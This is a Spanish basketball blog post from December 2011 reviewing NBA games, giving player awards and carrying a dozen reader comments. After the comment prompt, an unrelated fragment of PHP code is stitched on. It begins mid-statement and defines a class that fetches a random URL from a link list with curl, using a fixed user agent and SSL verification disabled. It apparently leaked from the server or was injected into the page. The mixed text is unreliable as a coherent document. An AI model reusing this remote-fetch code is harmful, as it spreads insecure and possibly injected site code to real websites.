La Crónica (29/12/2011)

30 de December de 2011 por TheDeerHunter

Noche de Jueves en España significa noche de partidazos en la NBA. Sólo que este año serán media docena en lugar de un par.

Sensacional duelo de artilleros anoche en el Chesapeake Energy Arena de Oklahoma. Durant y Dirk se liaron en un intercambio de canastones como no se había visto aún en este inicio de campaña. Se rememoraba así la final de conferencia del año pasado. Por un lado, Delonte (de titular por delante de Vince) y Terry y por el otro Ibaka y Harden fueron piezas fundamentales para tratar de llevarse la victoria. No así Westbrook, quien terminó en números correctos pero nuevamente con un alto número de errores. Si el choque fue recomendable en general, con los Mavs por fin recordando al equipo campeón y los Thunder actuales mostrando candidatura a sucederles, el clutch triple final de Durant con el que resolvió es antológico (102-104). No os lo podéis perder. I love this game!

Los Nuggets, sin embargo, perdieron su imbatibilidad en la siempre difícil visita al Rose Garden (102-111). La tríada Felton-Matthews-Jamal Crawford causó estragos. Lawson y Afflalo mantuvieron el ritmo, pero ni Nené, ni Gallinari tuvieron su mejor noche.

Por su parte, Chicago volvió a la senda de la victoria en Sacramento, aunque tuvieron que emplearse a fondo (108-98). El 20 de 34 en tiros libres fue una losa difícil de levantar para los locales. Tyreke estuvo especialmente mal en este aspecto… y ¿cómo un jugador de la talla de Travis Outlaw se permite 9 minutos tan tristes como esos?

Tres palizones para cerrar. Supermán se zampó a unos Nets lamentables (78-94); Kobe hizo lo propio ante unos Knicks también lamentables (82-99) y, ojo, porque los Spurs también salieron escaldados de Houston (85-105). Se trata de un equipo que notará especialmente la acumulación de partidos. A destacar el casi-triple doble de Lowry y la gran actuación de Scola y Martin, que comienzan a digerir mejor su condición de moneda de cambio.

PREMIOS

MVP: 30 puntos, 11 rebotes, 6 asistencias y buzzer-beater bestial de Kevin Durant para dar la 3ª victoria a Oklahoma City. Parece que hay alguien que quiere discutir el MVP y el anillo a Lebron James. Dwight Howard se fue a los 24 rebotes. A ver si se pica Love… Y Kyle Lowry se quedó cerca del triple-doble con 16 puntos, 9 rebotes y 8 asistencias. Y además, 3 robos de propina. Partidazo.

Rookie: En río revuelto ganancia de rookie descarado. Marshon Brooks aprovecha el desconcierto en el que están sumidos los Nets para jugarse sus tiros e ir anotando. 17 puntos consiguió ayer.

Sorpresa: 16 minutos necesitó CJ Watson para anotar 8 puntos, pillar 5 rebotes, repartir 9 asistencias y robar un par de balones. ¿Se puede hacer más en menos tiempo? Y Josh McRoberts puede hacer olvidar rápido a Lamar Odom con actuaciones tan completas como la de ayer: 10 puntos, 6 rebotes, 3 robos y 2 tapones.

Decepción: A lo mejor Deron Williams está añorando los días pasados en Turquía. Allí anotaba 50 puntos, aquí no acaba de encontrar el punto. 2 de 12 en tiro y 6 balones perdidos. Necesita mejorar, que dirían en el cole.

Esfuerzo en vano: Dirk Nowitzki cuajó una gran actuación (29-10) pero tuvo que hincar la rodilla ante Durantula. Los 25 puntos y 8 robos de Ty Lawson son también muy destacables.

Como ya comentamos hace un tiempo, durante los fines de semana no habrá crónica. Si queremos mantener el ritmo durante la semana nos toca descansar sábados y domingos. Eso sí, publicaremos un par de análisis (y de los interesantes) y volveremos el lunes con un resumen de lo más interesante de las noches del viernes, sábado y domingo.

Imágenes | AP Photos / Getty Images

Comenta

62 comentarios a esta entrada

  1. Nacho dice:
    #1

    Eso sí, DeRozan lleva un principio de temporada bluff

      Citar

  2. Nacho dice:
    #2

    Al final los Magic, pero han necesitado una racha de triples increíble en el último cuarto, y el obvio bajón de los de Toronto.

      Citar

  3. Pop dice:
    #3

    Estoy viendo a Reggie Miller disfrazado de Kevin Love. No se cuantos triples lleva, pero los mete como si el aro tuviera 2 metros de ancho.

      Citar

  4. Pop dice:
    #4

    Dios, vaya minutos de Ricky por favor. Esta volviendo locos a los Mavericks.

      Citar

  5. Nacho dice:
    #5

    Impresionante

      Citar

  6. Pop dice:
    #6

    Woah. Han ganado los Wolves de calle. Gran, gran partido.

    Mucho acierto exterior para Minnesota, y qué frescura transmite Rubio. A mi sinceramente me esta sorprendiendo para bien.

      Citar

  7. HeiNeKeN dice:
    #7

    parcial de 0-14 de los Wolves y Dallas que ni olia el balon… Impresionante lo del publico cada vez que la toca Ricky… y la asistencia para Tolliver con cañito a Dirk… sin comentarios xDD

      Citar

  8. Pop dice:
    #8

    atencion a la sangria de Kobe para los Lakers. 2/15 lleva la criatura

      Citar

  9. Sancho88 dice:
    #9

    Bueno, el 6 de 28 más las 6 pérdidas son el mayor desastre que le he visto hacer a Kobe Bryant jamás. Lamentable. Ahora a ver a quién echan las culpas… en fin. Bueno, es deber comentar lo que ha pasado esta noche. DeMarcus Cousins pide el traspaso. Su cabeza de 20 años está peor amueblada que la de un niño de 10. Pero bueno, pide el traspaso y se habla de Washington como su destino preferido, para juntarse con Wall y ponerse a bailar el baile de mierda ese que hacen. Los Hawks y los Pistons también le quieren, según Basket 4us. En mi opinión, su mejor destino sería Atlanta sin ninguna duda. Es el mejor equipo de estos tres y podría jugar playoffs desde ya, además de formar una pareja temible con Horford.

    No obstante, lo mejor para Sacramento sería traspasarlo a Washington a cambio de Magee y Blatche, por ejemplo, ya que podrían completar así un gran juego interior junto a Hickson, con Hayes y Thompson de suplentes. Opinión personal: que se vaya. Es bueno, pero está loquísimo. Sinceramente, tal y como esta Sacramento, no le conviene tener un bicho así. Que se pire cuanto antes por el bien del equipo. Hoy sin él han ganado fácil a los Hornets. Vamos, con un lacito que ponga feliz año, yo le largaba pero ya

      Citar

  10. Denise dice:
    #10

    el 2/13 de Jannero Pargo, el 2/12 de Rudy Gay y el 3/11 entre Zach y Marc propician los 64 puntos de los Grizzlies perdiendo de 40 ante Bulls. Que mal inicio de los Ositos.
    Del Magic vc Raptors solo he visto los ultimos 15 minutos. En ese tramo, los Magic han hecho una muy buena defensa (hay un tapon brutal de Superman a Bargnani) y les ha salvado su mejor arma en los ultimos años: el tiro de 3. Espectacular Ryan Anderson y JJ Redick.

    PD: Al final Ricky gana el concurso de triples..xD

      Citar

  11. Sancho88 dice:
    #11

    jeje, con cancioncita incluida. brutal. bargnani chupón y los raptors tienen la peor defensa de la nba. que chufa!!

      Citar

  12. melo15 dice:
    #12

    Pues yo no creo que tengan que echar a Cousins, como ya he dicho no hay mejores pivots jovenes en la NBA
    Que lo envien a un sicologo y ya esta, aunque la pareja Wall-Cousins seria brutal y espectacular aunque Wall tampoco parece que curre mucho no?
    Que les pasa a los Wizards

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>